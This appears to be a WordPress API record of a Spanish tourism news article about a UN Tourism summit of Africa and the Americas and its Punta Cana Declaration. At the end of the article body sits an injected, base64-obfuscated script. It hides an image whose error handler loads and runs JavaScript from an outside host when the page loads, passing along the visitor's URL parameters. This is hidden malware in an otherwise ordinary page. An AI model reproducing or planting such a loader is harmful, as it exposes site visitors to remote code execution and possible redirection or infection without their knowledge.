{"id":8784,"date":"2024-10-08T12:44:34","date_gmt":"2024-10-08T15:44:34","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=8784"},"modified":"2025-08-13T15:37:34","modified_gmt":"2025-08-13T18:37:34","slug":"africa-y-las-americas-se-reunen-en-una-cumbre-historica-para-planificar-un-futuro-comun-en-materia-de-turismo","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=8784","title":{"rendered":"\u00c1frica y las Am\u00e9ricas se re\u00fanen en una cumbre hist\u00f3rica para planificar un futuro com\u00fan en materia de turismo"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-f4dae18106e51000bf51635b64ddb259\" style=\"background-color:#07659c\"><em>Los principales representantes del sector tur\u00edstico de \u00c1frica y las Am\u00e9ricas se han comprometido conjuntamente a esforzarse porque el sector se convierta en un pilar del desarrollo colectivo, sostenible e inclusivo en ambos continentes.<\/em><\/h3>\n\n\n\n<p>La Declaraci\u00f3n de Punta Cana se aprob\u00f3 al t\u00e9rmino de la primera reuni\u00f3n conjunta de las Comisiones Regionales para \u00c1frica y las Am\u00e9ricas de ONU Turismo, tras dos jornadas de debates en torno a las cuestiones clave de la formaci\u00f3n y las inversiones en el sector. La cumbre, que se ciment\u00f3 en los lazos que hist\u00f3ricamente vinculan ambas regiones, as\u00ed como en sus singulares y complementarias culturas, ha supuesto un hito y ha servido para reforzar la cooperaci\u00f3n y hacer hincapi\u00e9 en la importancia de capitalizar la innovaci\u00f3n, la educaci\u00f3n, la inversi\u00f3n y las industrias creativas para el futuro desarrollo del turismo.<\/p>\n\n\n\n<p>Al acto asistieron alrededor de 200 participantes de alto nivel, entre los que se encontraban 14 ministros de 27 pa\u00edses (15 americanos y 12 africanos). En sus palabras de bienvenida, el Secretario General de ONU Turismo, Zurab Pololikashvili, afirm\u00f3: \u00abEsta cumbre ha constituido una plataforma excepcional para forjar conexiones y tender puentes entre \u00c1frica y las Am\u00e9ricas, crear asociaciones interregionales estrat\u00e9gicas y fomentar proyectos de cooperaci\u00f3n Sur\u2011Sur; todo ello en beneficio del sector tur\u00edstico de ambas regiones\u00bb.<\/p>\n\n\n\n<h6 class=\"wp-block-heading has-text-align-center has-white-color has-text-color has-background has-link-color wp-elements-d92cab586aba4f2a2235f98e76e770df\" style=\"background-color:#045f94\"><em>Esta cumbre ofrece una plataforma \u00fanica para forjar conexiones y tender puentes entre \u00c1frica y las Am\u00e9ricas, crear asociaciones estrat\u00e9gicas interregionales y fomentar proyectos de cooperaci\u00f3n Sur-Sur, todo ello en beneficio del sector tur\u00edstico de las dos regiones<\/em><\/h6>\n\n\n\n<p>La Directora Ejecutiva de ONU Turismo, Natalia Bayona, afirm\u00f3: \u00ab\u00c1frica y las Am\u00e9ricas cuentan con un patrimonio cultural muy rico, paisajes diversos y conexiones hist\u00f3ricas profundas. Sin embargo, es evidente que las dificultades a las que se enfrentan \u2014una conectividad limitada, una serie de barreras normativas y administrativas y poco conocimiento de los respectivos mercados\u2014 impiden que la relaci\u00f3n de ambos sectores tur\u00edsticos sea tan fuerte como podr\u00eda ser.<\/p>\n\n\n\n<p>Hoy, nuestro objetivo es enfrentarnos a esas dificultades con decisi\u00f3n y fomentar una colaboraci\u00f3n que contribuir\u00e1 a impulsar el desarrollo econ\u00f3mico, promover el intercambio cultural y favorecer pr\u00e1cticas sostenibles que beneficiaran a todas nuestras comunidades\u00bb.<\/p>\n\n\n\n<p><strong><em>La Declaraci\u00f3n de Punta Cana<\/em><\/strong><\/p>\n\n\n\n<p>En una clara muestra de cooperaci\u00f3n Sur-Sur, la Declaraci\u00f3n de Punta Cana estableci\u00f3 una serie de compromisos mutuos para el desarrollo del turismo como motor del desarrollo inclusivo. En la Declaraci\u00f3n, los responsables tur\u00edsticos de ambas regiones reconocen que es de crucial importancia \u00abintensificar nuestros esfuerzos colectivos para fomentar el desarrollo sostenible\u00bb a trav\u00e9s del turismo, con una especial atenci\u00f3n a \u00abla inversi\u00f3n estrat\u00e9gica en la educaci\u00f3n, la innovaci\u00f3n y las industrias creativas\u00bb.&nbsp; El documento, que es fiel reflejo del esp\u00edritu de esta hist\u00f3rica Cumbre de Punta Cana, tambi\u00e9n subraya la importancia del turismo como una herramienta para preservar una cultura y un patrimonio compartidos y \u00fanicos.<\/p>\n\n\n\n<p>Los signatarios de la Declaraci\u00f3n pusieron de manifiesto su intenci\u00f3n de \u00abredoblar sus esfuerzos\u00bb, sobre todo en los siguientes \u00e1mbitos:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Inversiones estrat\u00e9gicas:&nbsp;<\/strong>Reforzar las asociaciones entre los sectores p\u00fablico y privado, estimular las inversiones en el sector y dar prioridad a la inversi\u00f3n mediante una formulaci\u00f3n de pol\u00edticas m\u00e1s eficaz. Impulsar tambi\u00e9n la conectividad entre ambas regiones, tanto en t\u00e9rminos de mejorar las conexiones a\u00e9reas como de facilitar el intercambio cultural.<\/li>\n\n\n\n<li><strong>Desarrollo de competencias y formaci\u00f3n:&nbsp;<\/strong>Dar prioridad a la inversi\u00f3n en educaci\u00f3n y formaci\u00f3n sobre turismo, ampliar el acceso al aprendizaje en l\u00ednea y sin conexi\u00f3n y promover el uso de la innovaci\u00f3n y las nuevas competencias digitales para mejorar los conocimientos de la fuerza laboral tur\u00edstica.<\/li>\n\n\n\n<li><strong>Innovaci\u00f3n:&nbsp;<\/strong>Promover competiciones de&nbsp;<em>startups&nbsp;<\/em>y emprendedores de ambas regiones para apoyar mejor a las MIPYME, tambi\u00e9n a las de las comunidades rurales, y promover soluciones innovadoras centradas en la sostenibilidad y la acci\u00f3n por el clima.<\/li>\n\n\n\n<li><strong>Industrias creativas:&nbsp;<\/strong>Promover el papel de las industrias culturales y creativas en el sector tur\u00edstico, mediante, entre otras iniciativas, la financiaci\u00f3n de proyectos con potencial para atraer turistas, desarrollar nuevos y diversos destinos y rutas culturales y garantizar que los beneficios que aporte el sector est\u00e9n orientados a un desarrollo social e integrador.<\/li>\n\n\n\n<li><strong>Cooperaci\u00f3n interregional:&nbsp;<\/strong>Apoyar el an\u00e1lisis de los mercados y otro tipo de investigaciones para identificar posibles \u00e1reas de crecimiento y oportunidades compartidas y desarrollar estrategias comunes para el desarrollo tur\u00edstico, incluso a trav\u00e9s de medios digitales, nuevos productos y ferias internacionales de turismo.<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Innovaci\u00f3n y educaci\u00f3n: \u00abConstruir hoy un mejor ma\u00f1ana\u00bb<\/strong><\/h2>\n\n\n\n<p>En consonancia con el enfoque m\u00e1s amplio de ONU Turismo sobre las inversiones en el sector, la cumbre reuni\u00f3 a l\u00edderes de los sectores p\u00fablico y privado, junto con representantes clave de instituciones financieras, para evaluar el panorama actual y las tendencias y perspectivas para \u00c1frica y las Am\u00e9ricas.<\/p>\n\n\n\n<p>Los oradores de alto nivel se\u00f1alaron el enorme potencial de las iniciativas de inversi\u00f3n conjunta entre ambas regiones, insistiendo en el creciente papel de la banca p\u00fablica y privada. La cumbre tambi\u00e9n se centr\u00f3 en la vital importancia de las inversiones para impulsar la transici\u00f3n ecol\u00f3gica del turismo tanto en \u00c1frica como en las Am\u00e9ricas, sobre todo en el \u00e1mbito de las infraestructuras y en el sector hotelero.<\/p>\n\n\n\n<p>Adem\u00e1s de en la innovaci\u00f3n, la cumbre puso el foco en la educaci\u00f3n y la formaci\u00f3n, haciendo hincapi\u00e9 en la apremiante necesidad de contar con personal cualificado en ambas regiones. Con especial atenci\u00f3n a los j\u00f3venes con talento, que deben encabezar la transformaci\u00f3n, los l\u00edderes tur\u00edsticos reconocieron la necesidad de fomentar iniciativas conjuntas de creaci\u00f3n de capacidad, elaboraci\u00f3n de planes de estudio y creaci\u00f3n de alianzas entre instituciones acad\u00e9micas, actores de la industria y organismos gubernamentales de ambas regiones.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.unwto.org\/es\/news\/africa-y-las-americas-se-unen-en-una-cumbre-historica-para-planificar-un-futuro-turistico-compartido\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"477\" height=\"76\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/06\/ONU-Turismo-Logo.jpg\" alt=\"\" class=\"wp-image-8343\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/06\/ONU-Turismo-Logo.jpg 477w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/06\/ONU-Turismo-Logo-300x48.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2024\/06\/ONU-Turismo-Logo-320x51.jpg 320w\" sizes=\"(max-width: 477px) 100vw, 477px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Los principales representantes del sector tur\u00edstico de \u00c1frica y las Am\u00e9ricas se han comprometido conjuntamente a esforzarse porque el sector se convierta en un pilar del desarrollo colectivo, sostenible e inclusivo en ambos continentes. La Declaraci\u00f3n de Punta Cana se aprob\u00f3 al t\u00e9rmino de la primera reuni\u00f3n conjunta de las Comisiones Regionales para \u00c1frica y [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":8789,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[29,12],"tags":[],"class_list":["post-8784","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-datos-utiles","category-internacionales"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8784","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8784"}],"version-history":[{"count":4,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8784\/revisions"}],"predecessor-version":[{"id":10067,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/8784\/revisions\/10067"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/8789"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8784"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8784"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8784"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}